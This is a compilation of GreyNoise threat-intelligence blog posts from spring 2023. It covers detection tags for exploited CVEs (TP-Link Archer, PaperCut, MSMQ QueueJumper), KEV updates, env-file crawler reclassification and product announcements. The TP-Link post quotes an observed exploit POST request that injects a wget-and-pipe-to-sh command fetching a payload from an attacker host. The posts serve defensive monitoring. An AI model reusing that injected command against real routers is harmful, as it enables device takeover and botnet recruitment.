At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Last week the Threat Analysis team at Trinity Cyber reached out to GreyNoise providing evidence of exploitation for CVE-2023-1389, a command injection vulnerability in TP-Link Archer AX21 firmware. With the provided information, in under two hours, GreyNoise deployed a tag to detect and confirm exploitation in the wild. You can read more about this here.

Shortly after shipping that tag, Trinity Cyber then provided evidence for five more CVEs which we were able to get tagged and published this week for all of our users! They are as follows:

  • CVE-2023-0640: a remote code execution vulnerability in TRENDnet TEW-652BRP
  • CVE-2023-27240: a remote code execution vulnerability in Tenda AX3
  • CVE-2019-20500: a remote code execution vulnerability in D-Link DWL-2600AP
  • CVE-2022-29303: a remote code execution vulnerability in Solarview Compact 6
  • CVE-2022-27002: a remote code execution vulnerability in Arris TR3300 

Thank you for your transparency and continued support, Trinity Cyber! Together we make the internet safer.

Want to partner with GreyNoise? Learn More >>

GreyNoise Round Up: Product Updates - April 2023

GreyNoise added a number of exciting updates in April, including 20 new tags for users to monitor emerging vulnerabilities and threats, and identify benign actors. We’ve also added integration updates to support our new IP Similarity and Timeline features, and enhancements to the IP Similarity capability to improve accuracy and give users a summary view to easily understand similar IP infrastructure.

IP Similarity Enhancements 

New IP Similarity Summary View

GreyNoise IP Similarity Summary View

We’ve enhanced our IP Similarity feature with a summary view that breaks down the high level summary of what fields we found similar in our dataset, and allows customers to quickly scan for common fields and tags.  IP Similarity is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

IP Similarity Model Updates

We've updated the algorithm used by our IP Similarity to improve accuracy through several changes. Feature vectors are scaled and normalized to increase the distance between low and high information numbers, resulting in lower similarity scores. Bugs related to tokenizing user agent and web path strings were fixed, and options like 'unknown' and certain domain names were excluded. Values for webpath, rDNS, OS, and ports were adjusted, resulting in a feature vector with 693 items. Lastly, the minimum info threshold was raised to help improve accuracy of results.

IP Timeline Enhancements 

GreyNoise IP Timeline Enhancements

90 Days of IP Timeline Data Now Available

We’ve enhanced our IP timeline feature to store up to 90 days of IP history data (previously, we provided up to 60 days of data) to enable customers to better understand historical IP activity when threat hunting or performing incident response.  IP Timeline is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

New and Updated Integrations

Integration Update: Anomali ThreatStream Enrichment

GreyNoise Similarity Intel

We updated our Anomali ThreatStream Enrichment to include our IP Similarity and IP Timeline features. From the context of an observable, customers can now see all details GreyNoise knows, plus view similar IPs and the timeline of observed activity. Learn More

New Integration: Anomali ThreatStream Malicious IP Feed

Our Malicious IP Feed is now available on the Anomali ThreatStream marketplace. Customers can now easily subscribe to the feed and get a daily update of malicious IPs that GreyNoise observed scanning the internet in the last 24 hours. Learn More

Integration Update: Splunk SOAR

We updated our Splunk SOAR integration to introduce two new commands: "similar noise ips" and "noise ip timeline". These commands pull data from the GreyNoise IP Similarity and IP Timeline features and allow customers to bring that context into Splunk SOAR for an analyst to use during an investigation.  Learn More

Integration Update: Maltego

We updated our Maltego Enterprise transform set to include a new Transform that allows for users to query for Similar IPs.  This leverages the new IP Similarity tool, and allows for Maltego users to bring similar IPs into their graph for additional research and correlation within Maltego.  Learn More

Integration Update: GreyNoise SDK

The GreyNoise SDK has been updated to include both CLI and API based commands to interact with the new IP Timeline and IP Similarity APIs. Learn More

Tags Coverage Enhancements

In the month of April, GreyNoise added 20 new tags:

10 malicious activity tags

6 benign actor tags

4 unknown activity tags

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert that will inform them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

Change in ENV Crawler Tags as Bots Continue to Target Environment Files

On Tuesday, April 25, 2023, GreyNoise is changing how we classify environment file crawlers from unknown intent to malicious intent.  At the time of publication, this change will result in the reclassification of over 11,000 IPs as malicious.  Users who use GreyNoise’s malicious tag to block IPs based on malicious intent will see an increase in blocked IPs.

Active Exploitation Attempts (CVE-2023-1389) Against TP-Link Archer Gigabit Internet Routers

In collaboration with our partner Trinity Cyber, GreyNoise has a new tag for scan traffic related to CVE-2023-1389, a pre-auth command injection weakness in TP-Link Archer routers.

New Vulnerability: PaperCut MF/NG

On Friday, April 21, 2023, CISA added CVE-2023-27350 (a critical unauthenticated remote code execution vulnerability) impacting PaperCut MF and PaperCut NG to the Known Exploited Vulnerabilities (KEV) list.  PaperCut MF and PaperCut NG are both enterprise printer management software. 

A Trio of Tags For Identifying Microsoft Message Queue Scanners And Exploiters Live Now - QueueJumper (CVE-2023-21554)

Check Point Research discovered three vulnerabilities in Microsoft Message Queuing (MSMQ) service, patched in April's Patch Tuesday update. The most severe, QueueJumper (CVE-2023-21554), is a critical vulnerability allowing unauthenticated remote code execution. GreyNoise has a tag, classified as malicious, for the full QueueJumper RCE Attempt.

Sensor Coverage Enhancements

GreyNoise Sensor Coverage Enhancements

We’ve added additional sensor coverage for the following countries:

Destination country search is available in all commercial plans for GreyNoise and to our community VIP users. Start a trial* today to explore destination data.

Search Enhancements

GreyNoise Search Enhancements

The GNQL cheat sheet is now available in the search bar.  Want to learn more about how to effectively use GNQL? Review the cheat sheet for some helpful examples around syntax and available fields to use in search.

(*To begin your GreyNoise Enterprise Trial, sign-in to your account or sign-up for a free account, then go to your account details page and select "Start Trial".)
Get Started With GreyNoise for Free

KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389

On Monday, May 1, 2023, CISA added CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389 to the Known Exploited Vulnerabilities (KEV) list.  For all three CVEs, GreyNoise users had visibility into which IPs were attempting mass exploitation prior to their addition to the KEV list. GreyNoise tags allow organizations to monitor and prioritize the handling of alerts regarding benign and, in this case, malicious IPs.

kev tag coverage visual for the table


TP-LINK ARCHER AX21 COMMAND INJECTION VULNERABILITY SCAN | CISA KEV UPDATE: CVE-2023-1389

ORACLE WEBLOGIC CVE-2023-21839 RCE ATTEMPT | CISA KEV UPDATE: CVE-2023-21839


APACHE LOG4J RCE ATTEMPT | CISA KEV UPDATE: CVE-2023-45046

CVE CVE Description Tag Date KEV Date
CVE-2021-45046 Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. December 9, 2021 May 1, 2023
CVE-2023-21839 Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server. March 6, 2023 May 1, 2023
CVE-2023-1389 TP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution. April 25, 2023 May 1, 2023

Bonus Update:

On Thursday, April 27, 2023, GreyNoise released a tag for the critically scored CVE-2023-21554, QueueJumper, a Microsoft message queuing remote code execution vulnerability. 

As of this publication, we have not observed mass exploitation attempts, but have observed >600 IPs that are attempting to discover Internet-facing Microsoft Windows devices that respond over Microsoft Message Queuing (MSMQ) binary protocol.

Get Started With GreyNoise for Free

A Trio of Tags For Identifying Microsoft Message Queue Scanners And Exploiters Live Now - QueueJumper (CVE-2023-21554)

2023-04-28 Update

GreyNoise researchers now have a tag, classified as malicious, for the full QueueJumper RCE Attempt. As of the time of this post, no active RCE scanning attempts have been seen in GreyNoise for the past 90 days.

Check Point Research is slated to reveal full technical details later in the day on Friday, April 28, 2023.

MICROSOFT MESSAGE QUEUING (MSMQ) QUEUEJUMPER RCE ATTEMPT | CVE-2023-21554

MICROSOFT MESSAGE QUEUING (MSMQ) CRAWLER | CVES: No associated CVEs

MICROSOFT MESSAGE QUEUING (MSMQ) HTTP CRAWLER | CVES: No associated CVEs


Check Point Research discovered three vulnerabilities in Microsoft Message Queuing (MSMQ) service, patched in April's Patch Tuesday update. The most severe, QueueJumper (CVE-2023-21554), is a critical vulnerability allowing unauthenticated remote code execution. The other two vulnerabilities involve unauthenticated remote DoS attacks:

  • CVE-2023-21769 — unauthenticated Remote Application Level DoS (service crash)
  • CVE-2023-28302 — unauthenticated Remote Kernel Level DoS (Windows BSOD)

MSMQ, though considered a “legacy” service, is still available on all Windows operating systems.

According to Check Point researchers, over 360,000 IPs have the 1801/tcp port open, running the MSMQ service. The service may be enabled without user knowledge when installing certain software, such as Microsoft Exchange Server. Exploiting MSMQ vulnerabilities could allow attackers to take over servers. It's crucial for administrators to check their servers and install Microsoft's official patch. If unable to apply the patch, blocking inbound connections for 1801/tcp from untrusted sources can serve as a workaround.

GreyNoise researchers have two activity (vs exploitation attempt) tags that detect when someone is scanning to find exposed instances of the MSMQ service:

When we combine these tags, we presently see (at the time of publishing this post) just over 500 unique IP addresses — all from sources we’ve qualified as benign (👋🏼 Censys and Shadowserver!). The most prolific scanning is happening on the non-HTTP endpoint.

GreyNoise strongly recommends that organizations use our blocklists to shut down any identified malicious IPs with extreme prejudice before they have a chance to cause harm.

Our researchers are also hard at work digging into the details of each of the three weaknesses to craft specific exploitation detections which will, by default, be coming from malicious sources.

GreyNoise's detection capabilities for inventory scans of MSMQ protocols provide a reliable and essential tool in identifying and blocking malicious IPs targeting these vulnerabilities. With the accuracy of GreyNoise tags, security professionals can trust the system to highlight potential threats, allowing them to focus on other critical aspects of their organization's security. These IP Blocklists are available to all GreyNoise users now.*

*You must be signed in to access Blocklists. Create an account today. 

Get Started With GreyNoise for Free

New Vulnerability: PaperCut MF/NG

On Friday, April 21, 2023, CISA added CVE-2023-27350 (a critical unauthenticated remote code execution vulnerability) impacting PaperCut MF and PaperCut NG to the Known Exploited Vulnerabilities (KEV) list.  PaperCut MF and PaperCut NG are both enterprise printer management software. 

Originally ZDI-23-233, CVE-2023-27350 (CVSS 9.8) impacts both application servers and site servers for PaperCut MF and NG version 8.0 or later, according to PaperCut, and have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later.


PAPERCUT RCE ATTEMPT | CISA KEV UPDATE: CVE-2023-27350


PAPERCUT AUTHENTICATION BYPASS CHECK | CISA KEV UPDATE: CVE-2023-27350


The inclusion of this vulnerability on the KEV list implies that exploitation has been confirmed in the wild. Additionally, the PaperCut advisory also points out reports of exploitation dating back to April 13, 2023, 15:29 UTC.  

GreyNoise has published two tags related to this PaperCut vulnerability:

  • PaperCut RCE Attempt: IP addresses with this tag have been observed attempting to exploit CVE-2023-27350, an authentication bypass vulnerability in PaperCut MF/NG that could result in remote code execution.
  • PaperCut Authentication Bypass Check: IP addresses with this tag have been observed checking for the existence of CVE-2023-27350, an authentication bypass vulnerability in PaperCut MF/NG.

At the time of publication, GreyNoise has not observed mass exploitation for this vulnerability but has observed two IPs mass scanning for the vulnerability; this could be for a few reasons.  It could be that exploitation is happening in a more targeted fashion or simply because scanning for this vulnerability isn’t technically necessary as a specific Google search will return a few thousand hits which attackers can use to focus exploitation attempts on.

GreyNoise recommends that organizations that use PaperCut follow the vendor's guidance to upgrade and review systems for signs of compromise.  (This information is included in PaperCut’s advisory).

Sign up for a free GreyNoise account or request a demo to see how GreyNoise can help.

While signed in to GreyNoise, click below to set up a daily alert to be notified of new results.

  • Alert for “PaperCut RCE Attempt”
  • Alert for “PaperCut Authentication Bypass Check”

Active Exploitation Attempts (CVE-2023-1389) Against TP-Link Archer Gigabit Internet Routers

Today, in collaboration with our partner Trinity Cyber, GreyNoise has a new tag for scan traffic related to CVE-2023-1389, a pre-auth command injection weakness in TP-Link Archer routers.

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

The following is a sample of traffic related to these exploit attempts.

POST /cgi-bin/luci/;stok=/locale?form=country
HTTP/1.1Host: [redacted]
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 60
operation=write&country=$(id>`wget http://zvub[.]us/y -O-|sh`)

There has not been an observed, successful injection detected to-date, so we have published a “scan/crawler” tag — TP-Link Archer AX21 Command Injection Vulnerability Scan — to help organizations identify this activity and will be working closely with Trinity Cyber and other partners to identify successful exploit attempts to help identify successful malicious mass exploitation attempts.

Tenable initially identified this weakness, and has confirmed that successful exploitation is only likely across WAN interfaces under rare conditions. The Zero Day Initiative (ZDI) has also detected exploit activity and has suggested that their telemetry indicates that the Mirai botnet has updated its arsenal to include this new exploit. They further indicate that exploitation across the WAN interface will likely be difficult, but not impossible

Organizations should work to patch any known, official deployments of these routers and advise their remote workforce to ensure they apply the appropriate vendor updates as soon as possible if they have them installed at their remote location(s).

Our engineering team is performing a retroactive tagging exercise to determine if we have seen mass exploitation attempts within the previous ninety days. However, Trinity Cyber has shared that they have observed 193.32.162.189 actively engaged in current exploitation attempts.

GreyNoise suggests that, where possible, organizations block this IP address and use our hourly-updated block lists to help keep their infrastructure safe from mass exploitation attempts.

We will provide an update once we have a tag for a confirmed, successful malicious activity for this vulnerability.

Sign up for a free GreyNoise account or request a demo to see how GreyNoise can help.

While signed in to GreyNoise, click below to set up a daily alert to be notified of new results.

  • Alert for “TP-Link Archer Command Injection Probe”

Change in ENV Crawler Tags as Bots Continue to Target Environment Files

Crawlers finding public, unsecured environment files continue to be used to compromise organizations.

On Tuesday, April 25, 2023, GreyNoise is changing how we classify environment file crawlers from unknown intent to malicious intent.  At the time of publication, this change will result in the reclassification of over 11,000 IPs as malicious.  Users who use GreyNoise’s malicious tag to block IPs based on malicious intent will see an increase in blocked IPs.

Background

An environment file crawler is a bot that scours the internet for publicly available env files. The use of these files have been popular for over a decade and are used to pass dynamic environmental variables to software and services.

Environment files are dotfiles; dotfiles are hidden files that are hidden from the user by default but are editable by any text editor and contain configuration settings for various applications. An example of an environment file is:

APP_NAME=The App
APP_ENV=dev

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=theappdb
DB_USERNAME=thedatabaseuser
DB_PASSWORD=theappsecretpassword
API_KEY=abc123def456

Why are attackers so interested in env files?

They almost always contain sensitive data such as authentication information (ex. keys or passwords) and often their specific connection paths.  For this reason, env files should never be exposed publicly; anyone who obtains the file can potentially access sensitive information. Adding insult to injury, organizations often are unaware that they are exposing these files to the public, and these crawlers have been historically overlooked. 

What is GreyNoise changing?

For years, GreyNoise has monitored env scanners and classified them as unknown intent. However, we continuously strive to enhance our datasets to safeguard organizations and increase the effectiveness of SOCs; thus, we have decided to reclassify these crawlers as malicious. 

Click/tap here for more information on GreyNoise classifications.

The reclassification of intent will affect the following tags:

Why the change?

These files should never be publicly exposed since they typically contain sensitive information; the internet noise generated by the constant searching for these files is indicative of the scale of opportunistic attackers looking for credentials.

Using environment files to compromise organizations is a well-established tactic

There are numerous CVEs related to env files as information disclosure or code execution, including but not limited to:

Final thoughts:

Organizations should take proactive measures to regularly look for exposed .env files; scanning once won’t cut it as they can appear at any time. Searching for unsecured env files should be a part of an organization's vulnerability management program. If you do find a publicly available .env file for your organization, it is imperative that you immediately remediate the exposure and rotate any credentials that were leaked.  GreyNoise will continue to review the classifications of our tags to ensure their efficacy.

Sign up for a free GreyNoise account or request a demo to see how GreyNoise can help provide immediate protection from threats like these, especially when activity mutates from "unknown" or "benign" to "malicious.”

Get Started With GreyNoise for Free

10 Things You Could Do With Your Time Instead of Triaging a False Positive Alert

Spoiler Alert: It’s a lot…

SOC teams have struggled with false positive alerts since, well, the beginning of security centers. There are a lot of studies (by security vendors) on how much time SOC analysts spend on false positive alerts. Unfortunately, we are not IPO rich (yet) - so we didn’t conduct our own study - but we did take the average from a few (1, 2, 3) reports. According to our sources, a single analyst wastes an average of 8.4 hours per week triaging false positive alerts.* 

GreyNoise can help SOC teams reduce false positives by providing context to the alerts on internet-wide scanners, crawlers, and other suspicious activity that may trigger false alarms. How many times have you got an alert that turns out to be [insert security company] just scanning the internet?

Pictured: A security analyst, presumably, after discovering the alert they just got was actually GoogleBot.

 

By integrating GreyNoise into your alerting workflow, your team can eliminate background noise and focus on the most actionable and relevant alerts.

So what can you do with ~8+ hours of your life back each week?

  1. Make this delicious Lemon cheesecake recipe
  2. Knit this Lace shawl
  3. Hike the Inca Trail of Machu Picchu
  4. Build a coffee table
  5. Run a 50m (ultra?)marathon 
  6. Go Scuba diving, twice
  7. Tour the entire country of Monaco
  8. Listen to the longest continuous orchestral piece in history 
  9. Watch the first three of the Fast and Furious movies
  10. Give yourself an NFC manicure 

By using GreyNoise to filter out benign internet scanners, SOC teams can improve decision-making, reduce alert fatigue, and enable teams to focus their time and resources on genuine threats. Start exploring our data today.

*Yes, we know that the actual time spent varies based on the size of the security team and organization.

Get Started With GreyNoise for Free

Beyond the Noise: Why GreyNoise Malicious Feed is a Must-Have for Anomali Users

We recently built out a new Premium Feed for Anomali ThreatStream. Anomali customers can now pull in all malicious IPs GreyNoise has seen hitting our sensors in the past 24 hours, on a daily basis. 

While most feeds in Anomali are used to build lists of observables that will trigger alerts or investigations within their other security tools, GreyNoise is not your typical threat feed and should be treated differently. In this post, we’ll walk through how Anomali users should leverage the GreyNoise feed, how you can access a trial, and a couple other loose ends.

GreyNoise Malicious Feed in Anomali

Observables that show up in the GreyNoise Malicious Threat Feed in Anomali all have three things in common: 

  1. They are part of our Noise data set which means they have been seen scanning the internet in the past 24 hours BY GreyNoise (we are the first-hand collector of our data)
  2. In the past 30 days, they’ve done something GreyNoise determined to have malicious intent when interacting with our sensor network
  3. They are NOT a benign actor with a legitimate reason for scanning the internet that may look suspicious, but ultimately would be a waste of time or could have negative consequences if blocked.

Because of these, customers trust that GreyNoise Malicious Feed observables are associated with an IP that has been seen blasting large swaths of the internet, and likely not indicative of a targeted attack worth an analyst’s time to review. 

GreyNoise’s Malicious Feed in Anomali is best used as a feed for opportunistic attack activity that should be automatically blocked. Our data is highly reliable so many of our customers trust our data to leverage in automated actions, like blocking, to save their analysts’ time. Our malicious feed should NOT add to an analysts triage queue. 

Try it out

In order to try out the GreyNoise Malicious Feed in Anomali, you need a GreyNoise account with an active Enterprise trial. Start by Signing Up Here then clicking on the Activate Trial button on the GreyNoise Account page. Once you have the trial enabled, grab your GreyNoise API key, and head over to the Anomali Marketplace.

GreyNoise Premium Feed

In the Anomali Marketplace, find the Premium Feed for GreyNoise, then click Get Access and drop in your API key. This will provide you with 14 days of trial access to the feed.

If after the trial you’d like to make it a permanent feature in your Anomali instance, you can review our pricing page and reach out to the sales team with any questions. The GreyNoise Malicious Feed can be an add on to any of our standard packages!

A Complement to other Feeds in Anomali

While we’re on the topic, we’d be remiss to not mention the original use case for GreyNoise in Anomali. For observables coming from other sources within Anomali, we provide additional context through enrichment that other services don’t. If you're triaging an event and using Anomali to understand the details of an observable, the GreyNoise Enrichment for Anomali provides you with all the details you need to understand if the IP has been observed performing internet-wide scanning and what it has been scanning for. It will also highlight for you if the IP belongs to a common business service from our RIOT data set, in which instance blocking that IP may break something for your users.
 


Our Anomali Enrichment feature also recently got an upgrade, with IP Similarity and IP Timeline now available if included in your GreyNoise Subscription. These are great tools for folks looking to for a granular view of the scanning activity observed by GreyNoise for an observable or to identify other scanning IPs that may be leveraging similar scan and attack tactics.

Get Started With GreyNoise for Free

No blog articles found

Please update your search term or select a different category and try again.

Get started today